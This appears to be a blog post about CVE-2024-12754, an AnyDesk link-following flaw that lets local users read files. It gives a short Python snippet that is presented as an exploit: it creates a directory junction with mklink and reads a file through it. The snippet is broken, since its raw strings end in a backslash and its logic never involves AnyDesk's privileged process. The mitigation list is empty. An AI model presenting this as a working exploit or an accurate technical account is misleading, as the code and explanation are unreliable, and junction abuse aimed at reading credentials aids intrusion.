AnyDesk, a popular remote desktop application, was recently found to be vulnerable to an information disclosure attack (CVE-2024-12754), which allows local attackers to disclose sensitive information on affected installations. In this post, I will discuss this vulnerability in detail, including how it can be exploited, the specific code flaw responsible, and its potential consequences, as well as providing links to original references and code snippets to help understand the attack. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.

Exploit Details

The AnyDesk Link Following Information Disclosure Vulnerability (CVE-2024-12754) arises from a flaw in the handling of background images within the application. This flaw allows an attacker to create a junction, or links between directories, which can then be abused to read arbitrary files and disclose stored credentials. By gaining access to these credentials, an attacker can compromise the system further.

Here's a sample code snippet that illustrates how to create a junction and exploit the vulnerability

import os

# Create the malicious junction
junction_path = r"C:\Users\Public\Documents\AnyDesk\"
target_path = r"C:\Users\TargetUser\Contacts\"
os.system(f"mklink /J {junction_path}backgrounds {target_path}")

# Exploit the vulnerability to read arbitrary files and disclose stored credentials
with open(junction_path + "backgrounds\\SensitiveFile.txt", "r") as f:
    sensitive_data = f.read()
    print("Sensitive Data:", sensitive_data)

Original References

This vulnerability was initially reported as ZDI-CAN-23940 by the Zero Day Initiative (ZDI) and has since been assigned the CVE-2024-12754 identifier. You can find more information and references related to this vulnerability from the following sources:

1. ZDI's Original Advisory
2. CVE-2024-12754 on NVD
3. AnyDesk Official Security Release Notes

Mitigation and Recommendations

To protect against this vulnerability, it is recommended that users upgrade to the latest version of AnyDesk, which contains a patch addressing this specific flaw. Additionally, users should always follow general security best practices, such as:

Conclusion

The CVE-2024-12754 AnyDesk Link Following Information Disclosure Vulnerability poses a significant risk to affected users, as it can allow local attackers to disclose sensitive information stored on the system, leading to a potential compromise of the system. By understanding the details of this vulnerability, keeping software up-to-date, and following security best practices, users can better protect their systems from this threat.

Timeline

Published on: 12/30/2024 17:15:07 UTC